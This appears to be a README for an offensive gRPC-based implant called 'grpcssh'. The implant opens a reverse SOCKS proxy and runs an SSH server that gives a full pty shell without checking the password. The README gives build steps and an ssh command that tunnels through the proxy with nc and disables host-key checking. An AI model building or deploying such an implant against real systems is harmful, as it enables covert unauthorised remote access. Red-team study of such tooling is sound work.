better explained over at https://tishina.in/ops/grpcssh
an extension of grpc-ssh-socks. this can be considered a simple reverse shell: on connect,
the server opens a socks proxy, and connecting over ssh (through that proxy) to a hardcoded ip address with
an arbitrary password grants a full pty shell, i.e. the password is not checked.
DNS resolution is very simple and is done over an SSH "session" channel in the form of Write(addr), Read(ip).
this is a reference implementation of a reverse socks proxy in a gRPC-based implant. the SSH server is added mostly for fun.
for the pty shell, full credit goes to https://gist.github.com/jpillora/
here it is, kind of working. run
~/grpcssh$ make
to build this even more abominable thing, then run
~/grpcssh$ ssh -o ProxyCommand="nc -x localhost:1080 %h %p" -o "UserKnownHostsFile=/dev/null" [email protected]
to get a shell (localhost:1080 is the socks proxy opened on connect; the host is the hardcoded ip address).